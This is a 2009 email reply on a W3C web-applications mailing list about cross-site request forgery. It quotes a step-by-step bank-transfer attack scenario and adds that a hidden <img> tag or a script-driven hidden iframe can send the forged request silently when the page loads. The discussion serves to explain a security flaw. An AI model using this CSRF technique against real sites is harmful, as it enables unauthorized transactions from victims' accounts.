- From: Mike Wilson <mikewse@hotmail.com>
- Date: Mon, 8 Jun 2009 17:50:48 +0200
- To: "'Giovanni Campagna'" <scampa.giovanni@gmail.com>, <public-webapps@w3.org>
Giovanni Campagna wrote: > 1) user visites http://www.mybank.com/login > 2) the server sends a cookie, call it MyBankSID, with the > login information > 3) user visites http://www.dangerous.com/ within the > expiration time of cookie > 4) the user clickes a link (or sends a form) to > http://www.mybank.com/pay?to=hacker > 5) the browser sends MyBankSID cookie, which grants access to user's > bank account > 6) money goes from the user to the attacker There actually is no need of user action in (4) to be hit by the security leak. If the protected URL can be called with GET then it's enough for www.dangerous.com to include f ex an <img src="http://www.mybank.com/pay?to=hacker"> and the victim's browser will happily send the request together with the secret cookie at page load time. If POST is required then it can be done by script and a hidden iframe, also at page load time. Best regards Mike Wilson
Received on Monday, 8 June 2009 15:51:33 UTC